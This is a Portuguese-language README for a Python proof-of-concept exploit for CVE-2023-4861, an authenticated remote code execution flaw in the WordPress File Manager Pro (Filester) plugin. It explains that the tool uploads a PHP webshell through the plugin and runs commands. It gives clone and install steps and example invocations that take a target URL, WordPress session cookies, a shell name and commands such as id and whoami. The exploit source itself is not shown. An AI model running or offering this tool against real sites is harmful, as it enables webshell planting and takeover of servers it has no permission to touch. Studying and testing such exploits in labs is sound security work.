
Automação de prova de conceito para execução remota de código autenticada no WordPress File Manager Pro (Filester) via upload arbitrário de arquivos, incluindo implantação de webshell e execução de comandos.
Este repositório contém uma prova de conceito em Python para CVE-2023-4861, uma vulnerabilidade de execução remota de código autenticada no plugin WordPress File Manager Pro - Filester.
CVE-2023-4861File Manager Pro - Filester (filester)< 1.8.11.8.1Admin+ no FilesterO exploit.py automatiza o mesmo resultado básico descrito no advisory público:
/var/www/html/ e permitir upload de .php.Detalhe importante da implementação: meu PoC assume que a raiz web do alvo é /var/www/html/. Isso está codificado nos dados da requisição e pode precisar de ajustes para outros ambientes de laboratório.
Clone o repositório e entre nele:
git clone https://github.com/nomaisthere/CVE-2023-4861-PoC.git
cd CVE-2023-4861-PoC
Instale as dependências:
pip install requests
Exibir ajuda:
python3 exploit.py --help
Exemplo básico:
python3 exploit.py --url http://target-wordpress --command id \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'
Nome de shell personalizado opcional:
python3 exploit.py --url http://target-wordpress --shell-name shell.php --command whoami \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'